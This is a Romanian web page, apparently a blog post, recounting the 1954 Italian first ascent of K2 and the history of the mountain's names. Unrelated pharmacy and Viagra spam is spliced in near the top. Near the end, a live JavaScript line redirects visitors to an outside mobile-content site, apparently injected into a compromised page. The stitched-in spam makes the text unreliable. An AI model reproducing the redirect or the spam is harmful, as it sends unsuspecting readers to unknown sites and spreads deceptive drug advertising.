Într-o zi de 31 iulie…

…in 1954, avea loc prima ascensiune a varfului K2, al doilea cel mai inalt varf muntos dar cel mai greu de cucerit varf din lume, de catre o expeditie italiana condusa de Ardito Desio.

Writing essays and papers

order indocin online canadian pharmacy order indocin online canada order Indocin no prescription au order Indocin no prescription toronto. buy pills paroxetineВ  poza_generale_31

Generic Viagra: canada supreme court okays move to make it

K2 este al doilea munte ca inaltime din lume, dupa Everest. Are 8.611 metri, este situat la 1.500 km vest de Everest, in mijlocul Asiei. Litera K desemneaza masivul Karakorum, uriasul lant muntos aflat la nord-vest de Himalaya centrala, iar cifra 2 o ordine stabilita arbitrar de primii topografi. K2 continua sa fie prezent pe cele mai multe harti, desi incercarile de a i se da un nume nu au lipsit. Spre exemplu, englezii au incercat, ca in cazul Everestului, sa-i dea numele unui geograf de-al lor (Godwin Austen) care a efectuat, in 1861, ridicari topografice in imprejurimi. Au fost propuse si alte nume ca Akbar si Lamba Pahar, care in traducere literara inseamna “Muntele Mare”, dar nici unul nu s-a impus. In ultima vreme numele de Chogori s-a raspandit mai mult, el fiind dat de locuitorii Baltistanului, pe teritoriul caruia se afla (Chogo insemnand in dialectul balti “mare”, iar ri “munte”, deci “Muntele Mare” ). Dar numele cifrat a intrat si in limbajul localnicilor, iar pronuntia englezeasca “Kei tu” risca sa se statorniceasca definitiv. In 1902 un grup de alpinisti au facut prima tentativa pe K2. Aceasta prima tentativa asupra celui de-al doilea munte al lumii s-a incheiat cu rezultate modeste. Dupa cel de-Al Doilea Razboi Mondial se reiau tentativele de cucerire a lui K2. In 1953 profesorul geolog Ardito Desio intreprinde o calatorie preliminara in regiunea Baltoro si intocmeste un plan amanuntit privind in egala masura partea alpinistica (cucerirea lui K2), cat si cercetarile stiintifice ce urmau sa se efectueze. Desio a conceput o expeditie grea. Ea a fost finantata de Consiliul National de Cercetari si Comitetul Olimpic Italian. O comisie a Clubului Alpin Italian a selectionat un lot de 23 de alpinisti, elemente de prima mana, a caror varsta nu cobora sub 23 de ani si nu depasea 47 de ani. Dintre acestia, dupa multe verificari sunt retinuti pentru expeditia pe K2 11 alpinisti. Din grupul condus de Ardito Desio, pe langa alpinisti mai faceau parte: un topograf, un antropolog, un geolog, un medic si un operator de film. La 31 iulie 1954, la ora 18.00, dupa eforturi la limita posibilitatii omenesti, varful celui de-al doilea munte al lumii este cucerit de alpinistii italieni Compagnoni Achille si Lacedelli Lino. Alpinistul timisorean, stomatologul in varsta de 27 de ani Horia Colibasanu, de la Clubul Sportiv “Alternative”, a reusit la data de 28 iulie 2004 prima ascensiune romaneasca pe temutul varf himalayan K2, apreciat a fi cel mai dificil de escaladat din lume.

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile necesare sunt marcate *